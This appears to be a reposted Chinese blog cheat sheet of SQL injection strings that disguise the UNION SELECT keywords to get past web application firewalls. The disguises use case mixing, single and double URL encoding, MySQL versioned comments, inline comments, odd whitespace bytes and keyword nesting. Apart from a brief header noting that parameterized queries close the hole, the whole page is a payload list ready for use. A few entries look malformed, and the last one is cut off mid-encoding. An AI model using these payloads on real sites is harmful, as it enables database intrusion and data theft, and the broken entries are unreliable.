• sql注入绕过union select过滤


      1 #
      2 #
      3 #
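      4 #WAF Bypassing Strings: the entries below respell the UNION SELECT keyword pair using mixed case, URL encoding (single and double), MySQL /*!...*/ versioned comments, inline comments, alternate whitespace bytes and keyword nesting. A filter that matches the literal keywords without first decoding and normalizing the input will miss them; parameterized queries remove the injection point regardless of spelling.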
      5  
      6  /*!%55NiOn*/ /*!%53eLEct*/
      7  
      8  %55nion(%53elect 1,2,3)-- -
      9  
     10  +union+distinct+select+
     11  
     12  +union+distinctROW+select+
     13  
     14  /**//*!12345UNION SELECT*//**/
     15  
     16  /**//*!50000UNION SELECT*//**/
     17  
     18  /**/UNION/**//*!50000SELECT*//**/
     19  
     20  /*!50000UniON SeLeCt*/
     21  
     22  union /*!50000%53elect*/
     23  
     24  +#uNiOn+#sEleCt
     25  
     26  +#1q%0AuNiOn all#qa%0A#%0AsEleCt
     27  
     28  /*!%55NiOn*/ /*!%53eLEct*/
     29  
     30  /*!u%6eion*/ /*!se%6cect*/
     31  
     32  +un/**/ion+se/**/lect
     33  
     34  uni%0bon+se%0blect
     35  
     36  %2f**%2funion%2f**%2fselect
     37  
     38  union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
     39  
     40  REVERSE(noinu)+REVERSE(tceles)
     41  
     42  /*--*/union/*--*/select/*--*/
     43  
     44  union (/*!/**/ SeleCT */ 1,2,3)
     45  
     46  /*!union*/+/*!select*/
     47  
     48  union+/*!select*/
     49  
     50  /**/union/**/select/**/
     51  
     52  /**/uNIon/**/sEleCt/**/
     53  
     54  /**//*!union*//**//*!select*//**/
     55  
     56  /*!uNIOn*/ /*!SelECt*/
     57  
     58  +union+distinct+select+
     59  
     60  +union+distinctROW+select+
     61  
     62  +UnIOn%0d%0aSeleCt%0d%0a
     63  
     64  UNION/*&test=1*/SELECT/*&pwn=2*/
     65  
     66  un?+un/**/ion+se/**/lect+
     67  
     68  +UNunionION+SEselectLECT+
     69  
     70  +uni%0bon+se%0blect+
     71  
     72  %252f%252a*/union%252f%252a /select%252f%252a*/
     73  
     74  /%2A%2A/union/%2A%2A/select/%2A%2A/
     75  
     76  %2f**%2funion%2f**%2fselect%2f**%2f
     77  
     78  union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
     79  
     80  /*!UnIoN*/SeLecT+
     81  
     82 ##
     83 #
     84 #
     85 #Union Select Bypass with URL-Encoded Method:
     86  
     87    %55nion(%53elect)
     88  
     89    union%20distinct%20select
     90  
     91    union%20%64istinctRO%57%20select
     92  
     93    union%2053elect
     94  
     95    %23?%0auion%20?%23?%0aselect
     96  
     97    %23?zen?%0Aunion all%23zen%0A%23Zen%0Aselect
     98  
     99    %55nion %53eLEct
    100  
    101    u%6eion se%6cect
    102  
    103    unio%6e %73elect
    104  
    105    unio%6e%20%64istinc%74%20%73elect
    106  
    107    uni%6fn distinct%52OW s%65lect
    108  
    109    %75%6e%6f%69%6e %61%6c%6c %73%65%6c%65%63%7
  • 原文地址:https://www.cnblogs.com/perl6/p/6120045.html